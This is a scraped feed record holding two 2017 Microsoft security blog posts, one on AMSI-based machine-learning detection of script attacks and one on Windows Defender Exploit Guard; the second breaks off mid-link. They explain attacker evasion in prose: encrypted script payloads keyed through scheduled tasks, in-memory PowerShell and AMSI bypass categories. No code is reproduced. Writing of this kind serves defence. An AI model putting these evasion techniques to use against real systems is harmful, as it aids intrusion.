"[](<https://msdnshared.blob.core.windows.net/media/2017/12/1-amsi-ml-banner-small.jpg>)[](<https://msdnshared.blob.core.windows.net/media/2017/12/1-amsi-ml-banner-small.jpg>)\n\nScripts are becoming the weapon of choice of sophisticated activity groups responsible for targeted attacks as well as malware authors who indiscriminately deploy commodity threats.\n\nScripting engines such as JavaScript, VBScript, and PowerShell offer tremendous benefits to attackers. They run through legitimate processes and are perfect tools for \u201cliving off the land\u201d\u2014staying away from the disk and using common tools to [run code directly in memory](<https://blogs.technet.microsoft.com/mmpc/tag/in-memory-attacks/>). Often part of the operating system, scripting engines can evaluate and execute content from the internet on-the-fly. Furthermore, integration with popular apps makes them effective vehicles for delivering malicious implants through social engineering, as evidenced by the increasing use of [scripts in spam campaigns](<https://blogs.technet.microsoft.com/mmpc/2017/02/02/improved-scripts-in-lnk-files-now-deliver-kovter-in-addition-to-locky/>).\n\nMalicious scripts are not only used as delivery mechanisms. We see them in various stages of the kill chain, including during lateral movement and while establishing persistence. During these latter stages, the scripting engine of choice is clearly PowerShell\u2014the _de facto_ scripting standard for administrative tasks on Windows\u2014with the ability to invoke system APIs and access a variety of system classes and objects.\n\nWhile the availability of powerful scripting engines makes scripts convenient tools, the dynamic nature of scripts allows attackers to easily evade analysis and detection by antimalware and similar endpoint protection products. 
Scripts are easily obfuscated and can be loaded on-demand from a remote site or a key in the registry, posing detection challenges that are far from trivial.\n\nWindows 10 provides optics into script behavior through [Antimalware Scan Interface (AMSI)](<https://blogs.technet.microsoft.com/mmpc/2015/06/09/windows-10-to-offer-application-developers-new-malware-defenses/>), a generic, open interface that enables [Windows Defender Antivirus](<https://docs.microsoft.com/en-us/windows/threat-protection/windows-defender-antivirus/windows-defender-antivirus-in-windows-10?ocid=cx-blog-mmpc>) to look at script contents the same way script interpreters do\u2014in a form that is both unencrypted and unobfuscated. In [Windows 10 Fall Creators Update](<https://blogs.windows.com/windowsexperience/2017/10/17/whats-new-windows-10-fall-creators-update/>), with knowledge from years of analyzing script-based malware, we\u2019ve added deep behavioral instrumentation to the Windows script interpreter itself, enabling it to capture system interactions originating from scripts. AMSI makes this detailed interaction information available to registered AMSI providers, such as Windows Defender Antivirus, enabling these providers to perform further inspection and vetting of runtime script execution content.\n\nThis unparalleled visibility into script behavior is capitalized on further through other Windows 10 Fall Creators Update enhancements in both Windows Defender Antivirus and Windows Defender Advanced Threat Protection ([Windows Defender ATP](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp?ocid=cx-blog-mmpc?ocid=cx-blog-mmpc>)). 
Both solutions make use of powerful machine learning algorithms that process the improved optics, with Windows Defender Antivirus delivering enhanced blocking of malicious scripts pre-breach and Windows Defender ATP providing effective behavior-based alerting for malicious post-breach script activity.\n\nIn this blog, we explore how Windows Defender ATP, in particular, makes use of AMSI inspection data to surface complex and evasive script-based attacks. We look at advanced attacks perpetrated by the highly skilled KRYPTON activity group and explore how commodity malware like Kovter abuses PowerShell to leave little to no trace of malicious activity on disk. From there, we look at how Windows Defender ATP [machine learning systems](<https://blogs.technet.microsoft.com/mmpc/2017/08/03/windows-defender-atp-machine-learning-detecting-new-and-unusual-breach-activity/>) make use of enhanced insight about script characteristics and behaviors to deliver vastly improved detection capabilities.\n\n## KRYPTON: Highlighting the resilience of script-based attacks\n\nTraditional approaches for detecting potential breaches are quite file-centric. Incident responders often triage autostart entries, sorting out suspicious files by prevalence or unusual name-folder combinations. With modern attacks moving closer towards being completely fileless, it is crucial to have additional sensors at relevant choke points.\n\nApart from not having files on disk, modern script-based attacks often store encrypted malicious content separately from the decryption key. In addition, the final key often undergoes multiple processes before it is used to decode the actual payload, making it impossible to make a determination based on a single file without tracking the actual invocation of the script. 
Even a perfect script emulator would fail this task.\n\nFor example, the activity group KRYPTON has been observed hijacking or creating scheduled tasks\u2014they often target system tasks found in exclusion lists of popular forensic tools like [Autoruns for Windows](<https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns>). KRYPTON stores the unique decryption key within the parameters of the scheduled task, leaving the actual payload content encrypted.\n\nTo illustrate KRYPTON attacks, we look at a tainted Microsoft Word document identified by [John Lambert](<https://twitter.com/JohnLaTwC/status/915590893155098629>) and the [Office 365 Advanced Threat Protection](<https://products.office.com/en-au/exchange/online-email-threat-protection>) team.[](<https://msdnshared.blob.core.windows.net/media/2017/12/2-ams-ml-krypton-lure.png>)\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/12/2b-amsi-ml-krypton-lure.png>)\n\n_Figure 1. KRYPTON lure document_\n\nTo live off the land, KRYPTON doesn\u2019t drop or carry over any traditional malicious binaries that typically trigger antimalware alerts. Instead, the lure document contains macros and uses the Windows Scripting Host (_wscript.exe_) to execute a JavaScript payload. This script payload executes only with the right RC4 decryption key, which is, as expected, stored as an argument in a scheduled task. Because it can only be triggered with the correct key introduced in the right order, the script payload is resilient against automated sandbox detonations and even manual inspection.\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/12/3b-amsi-ml-krypton-chain.jpg>)\n\n_Figure 2. KRYPTON script execution chain through wscript.exe_\n\n## Exposing actual script behavior with AMSI\n\nAMSI overcomes KRYPTON\u2019s evasion mechanisms by capturing JavaScript API calls after they have been decrypted and are ready to be executed by the script interpreter. 
The screenshot below shows part of the exposed content from the KRYPTON attack as captured by AMSI.\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/12/4-amsi-ml-krypton-script-captured.png>)\n\n_Figure 3. Part of the KRYPTON script payload captured by AMSI and sent to the cloud for analysis_\n\nBy checking the captured script behavior against indicators of attack (IoAs) built up by human experts as well as machine learning algorithms, Windows Defender ATP effortlessly flags the KRYPTON scripts as malicious. At the same time, Windows Defender ATP provides meaningful contextual information, including how the script is triggered by a malicious Word document.\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/12/5-amsi-ml-krypton-script-alert.png>)\n\n_Figure 4. Windows Defender ATP machine learning detection of KRYPTON script captured by AMSI_\n\n## PowerShell use by Kovter and other commodity malware\n\nNot only advanced activity groups like KRYPTON are shifting from binary executables to evasive scripts. In the commodity space, [Kovter malware](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/Kovter>) uses several processes to eventually execute its malicious payload. This payload resides in a PowerShell script decoded by JavaScript (executed by _wscript.exe_) and passed to _powershell.exe_ as an environment variable.\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/12/6-amsi-ml-kovter-alert.png>)\n\n_Figure 5. Windows Defender ATP machine learning alert for the execution of the Kovter script-based payload_\n\nBy looking at the [PowerShell payload content captured by AMSI](<https://blogs.technet.microsoft.com/poshchap/2015/10/16/security-focus-defending-powershell-with-the-anti-malware-scan-interface-amsi/>), experienced analysts can easily spot similarities to [PowerSploit](<https://github.com/PowerShellMafia/PowerSploit>), a publicly available set of penetration testing modules. 
While such attack techniques involve file-based components, they remain extremely hard to detect using traditional methods because malicious activities occur only in memory. Such behavior, however, is effortlessly detected by Windows Defender ATP using machine learning that combines detailed AMSI signals with signals generated by PowerShell activity in general.\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/12/7-amsi-ml-kovter-script-captured.png>)\n\n_Figure 6. Part of the Kovter script payload captured by AMSI and sent to the cloud for analysis_\n\n## Fresh machine learning insight with AMSI\n\nWhile AMSI provides rich information from captured script content, the highly variant nature of malicious scripts continues to make them challenging targets for detection. To efficiently extract and identify new traits differentiating malicious scripts from benign ones, Windows Defender ATP employs advanced machine learning methods.\n\nAs outlined in [our previous blog](<https://blogs.technet.microsoft.com/mmpc/2017/08/03/windows-defender-atp-machine-learning-detecting-new-and-unusual-breach-activity/>), we employ a supervised machine learning classifier to identify breach activity. We build training sets based on malicious behaviors observed in the wild and normal activities on typical machines, augmenting that with data from controlled detonations of malicious artifacts. The diagram below conceptually shows how we capture malicious behaviors in the form of process trees.\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/12/8-amsi-ml-process-tree.png>)\n\n_Figure 7. Process tree augmented by instrumentation for AMSI data_\n\nAs shown in the process tree, the kill chain begins with a malicious document that causes Microsoft Word (_winword.exe_) to launch PowerShell (_powershell.exe_). 
In turn, PowerShell executes a heavily obfuscated script that drops and executes the malware _fhjUQ72.tmp_, which then obtains persistence by adding a run key to the registry. From the process tree, our machine learning systems can extract a variety of features to build _expert classifiers_ for areas like registry modification and file creation, which are then converted into numeric scores that are used to decide whether to raise alerts.\n\nWith the instrumentation of AMSI signals added as part of the [Windows 10 Fall Creators Update](<https://blogs.windows.com/windowsexperience/2017/10/17/whats-new-windows-10-fall-creators-update/>) (version 1709), Windows Defender ATP machine learning algorithms can now make use of insight into the unobfuscated script content while continually referencing machine state changes associated with process activity. We\u2019ve also built a variety of script-based models that inspect the nature of executed scripts, such as the count of obfuscation layers, entropy, obfuscation features, [_ngrams_](<https://azure.microsoft.com/en-au/services/cognitive-services/text-analytics/>), and specific API invocations, to name a few.\n\nAs AMSI peels off the obfuscation layers, Windows Defender ATP benefits from growing visibility and insight into API calls, variable names, and patterns in the general structure of malicious scripts. And while AMSI data helps improve human expert knowledge and their ability to train learning systems, our _deep neural networks_ automatically learn features that are often hidden from human analysts.\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/12/9-amsi-ml-javascript-powershell-alert.png>)\n\n_Figure 8. Machine learning detections of JavaScript and PowerShell scripts_\n\nWhile these new script-based machine learning models augment our expert classifiers, we also correlate new results with other behavioral information. 
For example, Windows Defender ATP correlates the detection of suspicious script contents from AMSI with other proximate behaviors, such as network connections. This contextual information is provided to SecOps personnel, helping them respond to incidents efficiently.\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/12/10-amsi-ml-vbscript-network-alert.png>)\n\n_Figure 9. Machine learning combines VBScript content from AMSI and tracked network activity_\n\n## Detection of AMSI bypass attempts\n\nWith AMSI providing powerful insight into malicious script activity, attacks are more likely to incorporate AMSI bypass mechanisms that we group into three categories:\n\n * Bypasses that are part of the script content and can be inspected and alerted on\n * Tampering with the AMSI sensor infrastructure, which might involve the replacement of system files or manipulation of the load order of relevant DLLs\n * Patching of AMSI instrumentation in memory\n\nThe Windows Defender ATP research team proactively develops anti-tampering mechanisms for all our sensors. We have devised heuristic alerts for possible manipulation of our optics, designing these alerts so that they are triggered in the cloud before the bypass can suppress them.\n\nDuring actual [attacks involving CVE-2017-8759](<https://blogs.technet.microsoft.com/mmpc/2017/09/12/exploit-for-cve-2017-8759-detected-and-neutralized/>), Windows Defender ATP not only detected malicious post-exploitation scripting activity but also detected attempts to bypass AMSI using code similar to one identified by [Matt Graeber](<https://twitter.com/mattifestation/status/735261176745988096?lang=en>).\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/12/11-amsi-ml-bypass-alert.png>)\n\n_Figure 10. 
Windows Defender ATP alert based on AMSI bypass pattern_\n\nAMSI itself captured the following bypass code for analysis in the Windows Defender ATP cloud.\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/12/12b-amsi-ml-bypass-code-captured.png>)\n\n_Figure 11. AMSI bypass code sent to the cloud for analysis_\n\n## Conclusion: Windows Defender ATP machine learning and AMSI provide revolutionary defense against highly evasive script-based attacks\n\nProvided as an open interface on Windows 10, Antimalware Scan Interface delivers powerful optics into malicious activity hidden in encrypted and obfuscated scripts that are oftentimes never written to disk. Such evasive use of scripts is becoming commonplace and is being employed by both highly skilled activity groups and authors of commodity malware.\n\nAMSI captures malicious script behavior by looking at script content as it is interpreted, without having to check physical files or being hindered by obfuscation, encryption, or polymorphism. At the endpoint, AMSI benefits local scanners, providing the necessary optics so that even obfuscated and encrypted scripts can be inspected for malicious content. Windows Defender Antivirus, specifically, utilizes AMSI to dynamically inspect and block scripts responsible for dropping all kinds of malicious payloads, including ransomware and banking trojans.\n\nWith [Windows 10 Fall Creators Update](<https://blogs.windows.com/windowsexperience/2017/10/17/whats-new-windows-10-fall-creators-update/>) (1709), newly added script runtime instrumentation provides unparalleled visibility into script behaviors despite obfuscation. Windows Defender Antivirus uses this treasure trove of behavioral information about malicious scripts to deliver pre-breach protection at runtime. 
To deliver post-breach defense, Windows Defender ATP uses advanced machine learning systems to draw deeper insight from this data.\n\nApart from looking at specific activities and patterns of activities, new machine learning algorithms in Windows Defender ATP look at script obfuscation layers, API invocation patterns, and other features that can be used to efficiently identify malicious scripts heuristically. Windows Defender ATP also correlates script-based indicators with other proximate activities, so it can deliver even richer contextual information about suspected breaches.\n\nTo benefit from the new script runtime instrumentation and other powerful security enhancements like [Windows Defender Exploit Guard](<https://blogs.technet.microsoft.com/mmpc/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware/>), customers are encouraged to install [Windows 10 Fall Creators Update](<https://blogs.windows.com/windowsexperience/2017/10/17/whats-new-windows-10-fall-creators-update/>).\n\nRead [The Total Economic Impact of Microsoft Windows Defender Advanced Threat Protection from Forrester](<https://wincom.blob.core.windows.net/documents/WDATP_TEI%20_infographic%20_final.pdf>) to understand the significant cost savings and business benefits enabled by Windows Defender ATP. 
To directly experience how Windows Defender ATP can help your enterprise detect, investigate, and respond to advanced attacks, [sign up for a free trial](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp?ocid=cx-blog-mmpc>).\n\n \n\n**Stefan Sellmer**, _Windows Defender ATP Research_\n\n_with_\n\n**Shay Kels**, _Windows Defender ATP Research_\n\n**Karthik Selvaraj**, _Windows Defender Research_\n\n \n\n##### **Additional readings**\n\n * [Defend against PowerShell attacks](<https://blogs.msdn.microsoft.com/powershell/2017/10/23/defending-against-powershell-attacks/>), by Lee Holmes and the PowerShell team\n * [Windows Defender ATP machine learning: Detecting new and unusual breach activity](<https://blogs.technet.microsoft.com/mmpc/2017/08/03/windows-defender-atp-machine-learning-detecting-new-and-unusual-breach-activity/>)\n\n \n\n* * *\n\n#### **Talk to us**\n\nQuestions, concerns, or insights on this story? Join discussions at the [Microsoft community](<https://answers.microsoft.com/en-us/protect>) and [Windows Defender Security Intelligence](<https://www.microsoft.com/en-us/wdsi>).\n\nFollow us on Twitter [@WDSecurity](<https://twitter.com/WDSecurity>) and Facebook [Windows Defender Security Intelligence](<https://www.facebook.com/msftWDSI/>).", "modified": "2017-12-04T14:00:51", "published": "2017-12-04T14:00:51", "id": "MMPC:6B8C3A836431A67926F568B51D67E59F", "href": "https://blogs.technet.microsoft.com/mmpc/2017/12/04/windows-defender-atp-machine-learning-and-amsi-unearthing-script-based-attacks-that-live-off-the-land/", "type": "mmpc", "title": "Windows Defender ATP machine learning and AMSI: Unearthing script-based attacks that \u2018live off the land\u2019", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-13T02:30:35", "bulletinFamily": "blog", "cvelist": ["CVE-2017-11292", "CVE-2017-11826", "CVE-2017-8759"], "description": "Windows Defender Exploit 
Guard is a new set of intrusion prevention capabilities that ships with the [Windows 10 Fall Creators Update](<https://blogs.windows.com/business/?p=7645?ocid=cx-blog-mmpc>). The four components of Windows Defender Exploit Guard are designed to lock down the device against a wide variety of attack vectors and block behaviors commonly used in malware attacks, while enabling enterprises to balance their security risk and productivity requirements.\n\nTraditional antivirus technologies are an integral aspect of the endpoint security stack through the identification and removal of malicious executables using a combination of cloud-based machine learning and heuristics. Despite advances in antivirus detection capabilities, attackers are continuously adapting and have been expanding their arsenal of tricks and techniques to compromise endpoints, steal credentials, and execute ransomware attacks without ever needing to write anything to disk. This emerging trend of fileless attacks, which compose over 50% of all threats, is extremely dangerous: these attacks are constantly changing and designed to evade traditional AV. Fileless attacks have two types: those that use non-traditional executable files (e.g., documents with active content in them), and those that exploit vulnerabilities.\n\nWindows Defender Exploit Guard utilizes the capabilities of the Microsoft [Intelligent Security Graph (ISG)](<https://t.co/UpWPG34Kwy>) and the world-class security research team at Microsoft to identify active exploits and common behaviors to stop these types of attacks at various stages of the kill chain. Although the underlying vulnerability being exploited varies, the delivery mechanism differs, and the payload changes, there is a core set of behaviors and vectors that many different attacks adhere to. 
By correlating streams of events to various malicious behaviors with the ISG, Windows Defender Exploit Guard provides the capability and controls needed to handle these types of emerging threats.\n\nThe four components of Windows Defender Exploit Guard are:\n\n * **[Attack Surface Reduction (ASR)](<https://docs.microsoft.com/en-us/windows/threat-protection/windows-defender-exploit-guard/attack-surface-reduction-exploit-guard?ocid=cx-blog-mmpc>):** A set of controls that enterprises can enable to prevent malware from getting on the machine by blocking Office-, script-, and email-based threats\n * [**Network protection**](<https://docs.microsoft.com/en-us/windows/threat-protection/windows-defender-exploit-guard/network-protection-exploit-guard?ocid=cx-blog-mmpc>): Protects the endpoint against web-based threats by blocking outbound connections from any process on the device to untrusted hosts/IPs through Windows Defender SmartScreen\n * [**Controlled folder access**](<https://blogs.technet.microsoft.com/mmpc/2017/10/23/stopping-ransomware-where-it-counts-protecting-your-data-with-controlled-folder-access?ocid=cx-blog-mmpc>): Protects sensitive data from ransomware by blocking untrusted processes from accessing your protected folders\n * [**Exploit protection**](<https://docs.microsoft.com/en-us/windows/threat-protection/windows-defender-exploit-guard/exploit-protection-exploit-guard?ocid=cx-blog-mmpc>): A set of exploit mitigations (replacing EMET) that can be easily configured to protect your system and applications\n\n## Attack Surface Reduction (ASR): Intelligence to control the surface area of the device\n\nEmail and Office applications are generally thought of as keystones of enterprise productivity, yet they are the most common vector for attacks and can cause nightmares for security administrators. Both Office and email serve as simple and easy distribution mechanisms for bad actors to kick off malware and fileless attacks. 
Although Office macros and scripts have many productive use cases, malicious actors can use them to directly perform exploits that operate entirely in memory and are often undetectable by traditional AV techniques. All it takes is for a single user to enable macros on a legitimate-looking Office file, or to open an email attachment that executes a malicious PowerShell script, to compromise a machine.\n\nAttack Surface Reduction provides enterprises with a set of built-in intelligence that can block the underlying behaviors used by these malicious documents to execute without hindering productive scenarios. By blocking malicious behaviors independent of what the threat or exploit is, ASR can protect enterprises from never-before-seen zero-day attacks like the recently discovered [CVE-2017-8759](<https://blogs.technet.microsoft.com/mmpc/2017/09/12/exploit-for-cve-2017-8759-detected-and-neutralized?ocid=cx-blog-mmpc>), [CVE-2017-11292](<https://helpx.adobe.com/security/products/flash-player/apsb17-32.html>), and [CVE-2017-11826](<https://nvd.nist.gov/vuln/detail/CVE-2017-11826>).\n\nThe different behaviors ASR provides coverage for in the Fall Creators Update are split among [Office, scripts, and email](<https://docs.microsoft.com/en-us/windows/threat-protection/windows-defender-exploit-guard/attack-surface-reduction-exploit-guard#attack-surface-reduction-rules?ocid=cx-blog-mmpc>).\n\nFor Office apps, ASR can:\n\n * Block Office apps from creating executable content\n * Block Office apps from launching child processes\n * Block Office apps from injecting into other processes\n * Block Win32 imports from macro code in Office\n * Block obfuscated macro code\n\nAlthough malicious Office macros are oftentimes responsible for utilizing techniques like injection and launching of executables, ASR can also protect end-users from emerging exploits like 
[DDEDownloader](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit:O97M/DDEDownloader.A&ocid=cx-blog-mmpc>), which has recently been gaining in popularity. This exploit uses the Dynamic Data Exchange (DDE) popup in Office documents to run a PowerShell downloader; however, in doing so, it launches a child process that the corresponding child process rule blocks.\n\n(Note: To learn more about security settings that ensure Microsoft Office applications securely open documents with DDE fields, read [Microsoft Security Advisory 4053440](<https://technet.microsoft.com/library/security/4053440?ocid=cx-blog-mmpc>).)\n\nFor scripts, ASR can:\n\n * Block malicious JavaScript, VBScript, and PowerShell code that has been obfuscated\n * Block JavaScript and VBScript from executing payloads downloaded from the internet\n\nTo highlight the intelligence behind ASR, we can look at how it addresses obfuscated code as an example; in this case, there is a machine learning model powering our obfuscation detection capabilities that gets retrained multiple times per week in our cloud protection service. The model is updated on the client, where it interfaces with [Antimalware Scan Interface (AMSI)](<https://msdn.microsoft.com/en-us/library/windows/desktop/dn889587\\(v=vs.85\\).aspx>) to make a determination on whether or not a script has been obfuscated for malicious purposes. When a high-confidence match occurs, any attempt made to access the script is blocked.\n\nFor email, ASR can:\n\n * Block execution of executable content dropped from email (webmail/mail-client)\n\nEnterprise administrators can set policies on their corporate email (e.g., Office 365) to limit the files that can be delivered to end user inboxes. However, they don\u2019t have control over the files that are delivered via personal email on company devices. Given the increase in spear-phishing, employees' personal emails are also targeted and need to be protected. 
ASR enables enterprise administrators to apply file policies on personal email for both webmail & mail-clients on company devices.\n\nFor any line-of-business applications running within your enterprise, there is the capability to customize file- and folder-based exclusions if your applications include unusual behaviors that may be impacted by ASR detection.\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/10/windows-defender-exploit-guard-1-2.png>)\n\nASR requires that [Windows Defender Antivirus](<https://www.microsoft.com/en-us/windows/windows-defender?ocid=cx-blog-mmpc>) be the primary AV on the device and that its [real-time protection](<https://blogs.technet.microsoft.com/mmpc/2017/07/18/windows-defender-antivirus-cloud-protection-service-advanced-real-time-defense-against-never-before-seen-malware?ocid=cx-blog-mmpc>) feature be enabled. The Windows 10 Security [baseline](<https://blogs.technet.microsoft.com/secguide/2017/09/27/security-baseline-for-windows-10-fall-creators-update-v1709-draft/>) recommends enabling most of the rules in Block Mode to protect your devices from these threat vectors.\n\n## Network protection: Blocking outbound connections\n\nThe internet is home to a swath of malicious websites that are designed to lure and trick users. They use phishing, deceptive ads, tech scams, social engineering, and other means as part of their campaigns. Some attacks seek to acquire information or get an immediate financial payout, while others may attempt to install malware on the machine. Oftentimes malware will attempt to connect with a command-and-control (C&C) server to seek further instructions and deliver additional malicious payloads, such that the attacker can spread to additional machines on the network.\n\nWindows Defender SmartScreen protects Microsoft Edge from socially engineered malware, phishing, and other web-based threats through the power of the Intelligent Security Graph (ISG). 
This has made Microsoft Edge one of the most secure browsers out there, outperforming Chrome and Firefox in NSS Labs\u2019 recent [test results for phishing protection between August 23 and September 12, 2017](<https://research.nsslabs.com/reportaction/report-509/Marketing>).\n\nWindows Defender Exploit Guard\u2019s network protection capability utilizes this same intelligence from ISG to vet, and if necessary block, all outbound connections before they are made. This brings the level of protection that we previously had only for Microsoft Edge to the entire system and network stack.\n\nBy integrating a new network filtering driver into the kernel, the network protection capability can evaluate and block outbound network traffic based on ISG\u2019s hostname and IP address-related reputation intelligence. With a combination of cloud lookups and performant caching to perform these reputation checks, the network protection capability can render web-based malware that depends on a communication channel inoperable.\n\nRegardless of whether the outbound call is to a phishing site, socially engineered malware, or a C&C website, and whether the call originates from a browser or a background process, network protection can intercept and kill the connection. These filtering capabilities can also augment and work in concert with similar protection capabilities from other security solutions, browsers, etc.\n\n## Controlled folder access\n\nEncryption of files by ransomware and other unauthorized apps means losing control of your data: documents, precious photos and videos, and other important files. For enterprises and small businesses, losing access to files can mean disrupted operations. [Controlled folder access](<https://blogs.technet.microsoft.com/mmpc/2017/10/23/stopping-ransomware-where-it-counts-protecting-your-data-with-controlled-folder-access?ocid=cx-blog-mmpc>) protects files by locking down critical folders, allowing only authorized apps to access files. 
Unauthorized apps, including malicious and suspicious executable files, DLLs, scripts, and others will be denied access even when they are running with the user's or administrator's privilege, which malware is often able to secure.\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/10/windows-defender-exploit-guard-4-2.png>)\n\nBy default, Controlled folder access protects common folders where documents and other important data are stored, but it\u2019s also flexible. You can add additional folders to protect, including those on other drives. You can also allow apps that you trust to access protected folders, so if you\u2019re using a unique or custom app, your normal everyday productivity will not be affected.\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/10/windows-defender-exploit-guard-5-2.png>)\n\nWhen enabled, controlled folder access blocks unauthorized access and notifies the user of any attempt by unauthorized apps to access or modify files in protected folders. It delivers this protection in real-time.\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/10/windows-defender-exploit-guard-6-2.png>)\n\n## Exploit Protection\n\nWindows Defender Exploit Guard\u2019s exploit protection represents the suite of vulnerability mitigation and hardening techniques that are built directly into Windows 10. As you install the Fall Creators Update, the appropriate mitigation settings will already be configured and applied on the machine.\n\n### Rest In Peace (RIP) EMET\n\nUsers of the Enhanced Mitigation Experience Toolkit (EMET) will notice that it was automatically uninstalled from their machine during the upgrade. This is because WDEG includes the best of EMET built directly into Windows 10, so it\u2019s now just part of the platform. You can find the previous user experience for configuring EMET vulnerability mitigation capabilities in Windows Defender Security Center. 
For more information, read [Moving Beyond EMET II - Windows Defender Exploit Guard](<https://blogs.technet.microsoft.com/srd/2017/08/09/moving-beyond-emet-ii-windows-defender-exploit-guard?ocid=cx-blog-mmpc>).\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/10/windows-defender-exploit-guard-7-2.png>)\n\n_Figure shows using the Windows Security Center Exploit Protection control to enable the Export Address Filtering (EAF) mitigation for the unpatched application Word 2007_\n\nIt is important to note that Exploit Guard\u2019s exploit protection accepts a different format for the mitigation configuration than EMET did. To make the process of migrating to Exploit Protection and Windows Defender Exploit Guard easier, there is a PowerShell module that converts EMET XML settings files into Windows 10 mitigation policies for Exploit Guard. This PowerShell module also provides an additional interface for Windows Defender Security Center to configure its mitigation settings.\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/10/windows-defender-exploit-guard-8-2.png>)\n\nMore information about this PowerShell module, and details on the EMET features relative to security in Windows 10, can be found in the topic [Understanding Windows 10 in relation to the Enhanced Mitigation Experience Toolkit](<https://docs.microsoft.com/en-us/windows/threat-protection/overview-of-threat-mitigations-in-windows-10#understanding-windows-10-in-relation-to-the-enhanced-mitigation-experience-toolkit?ocid=cx-blog-mmpc>). For more details on Windows 10\u2019s threat mitigations, please refer to [Windows 10 Threat Mitigations](<https://docs.microsoft.com/en-us/windows/threat-protection/overview-of-threat-mitigations-in-windows-10?ocid=cx-blog-mmpc>). 
Finally, the Windows 10 Security [baseline](<https://blogs.technet.microsoft.com/secguide/2017/09/27/security-baseline-for-windows-10-fall-creators-update-v1709-draft/>) provides a recommended Exploit Protection XML to apply.\n\n## Windows Defender Exploit Guard manageability\n\nAll the Windows Defender Exploit Guard components are manageable by Group Policy (GP), System Center Configuration Manager (SCCM), and Mobile Device Management (MDM) solutions such as Microsoft Intune.\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/10/windows-defender-exploit-guard-9-2.png>)\n\nAll components support running in both Audit and Block modes. When Block mode is enabled and a corresponding malicious behavior is observed, Windows Defender Exploit Guard blocks the event from occurring in real-time. Block events for Attack Surface Reduction, Controlled folder access and Network Protection surface a notification toast on the endpoint in real-time as well as an event log entry, and can be centrally viewed by security operations personnel in the Windows Defender Advanced Threat Protection (WD ATP) console. Instead of actually blocking the behavior, Audit Mode detects if an event would have occurred and surfaces that information to the event log and WD ATP console. This enables enterprises to evaluate how a rule or feature within Windows Defender Exploit Guard will perform in their environment and determine whether there are exclusions that need to be set up. 
Additionally, Audit mode provides considerable visibility into what kinds of behaviors are going on across the enterprise, giving security admins valuable information to determine if a rule needs to be moved to Block mode.\n\n## Windows Defender Advanced Threat Protection\n\n[Windows Defender ATP](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp?ocid=cx-blog-mmpc>) provides a single-pane-of-glass experience for managing and viewing all the security feeds and events happening on managed endpoints across the enterprise. With Windows Defender ATP, the entire process tree execution can be seen for Exploit Guard events, making it extremely easy to determine what happened, such that a proper response can be executed. In the figure below you can see an example of how a malicious document in Word was used to drop an executable, which was then blocked when it attempted to access the _C:\\Demo_ folder.\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/10/windows-defender-exploit-guard-10-2.png>)\n\n_Controlled folder access blocking sample ransomware_\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/10/windows-defender-exploit-guard-11-2.png>)\n\n_Network Protection blocking phishing test via Chrome browser_\n\nExploit Guard is also surfaced in the Security Analytics dashboard of the Windows Defender ATP console, enabling enterprises to view how the feature is configured across their devices and to drive compliance with recommendations based on best practice security configurations.\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/10/windows-defender-exploit-guard-12-2.png>)\n\nIn the end, Windows Defender Exploit Guard is one of the most important new defenses that we\u2019ve added to Windows 10 in the Fall Creators Update. In many ways, it completes our stack for preventive protection. 
Organizations that deploy it alongside Windows Defender Antivirus will find that they have a highly effective and differentiated solution for addressing modern fileless attacks and host intrusion. We recommend you evaluate it at the earliest opportunity and we look forward to your feedback.\n\n_**Misha Kutsovsky (@mkutsovsky)**_\n\n_Program Manager, Windows Active Defense_\n\n \n\n### Learn more about Windows 10 Fall Creators Update\n\n[Microsoft 365 Security and Management Features Available in Fall Creators Update](<https://blogs.windows.com/business/2017/10/23/microsoft-365-security-management-features-available-windows-10-fall-creators-update?ocid=cx-blog-mmpc>)\n\n[Windows Defender Exploit Guard: Reduce the attack surface against next-generation malware](<https://blogs.technet.microsoft.com/mmpc/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware/?ocid=cx-blog-mmpc>)\n\n[Stopping ransomware where it counts: Protecting your data with Controlled folder access](<https://blogs.technet.microsoft.com/mmpc/2017/10/23/stopping-ransomware-where-it-counts-protecting-your-data-with-controlled-folder-access?ocid=cx-blog-mmpc>)\n\n[Making Microsoft Edge the most secure browser with Windows Defender Application Guard](<https://blogs.technet.microsoft.com/mmpc/2017/10/23/making-microsoft-edge-the-most-secure-browser-with-windows-defender-application-guard?ocid=cx-blog-mmpc>)\n\n[Introducing Windows Defender Application Control](<https://blogs.technet.microsoft.com/mmpc/2017/10/23/introducing-windows-defender-application-control?ocid=cx-blog-mmpc>)\n\n[Hardening the system and maintaining integrity with Windows Defender System Guard 
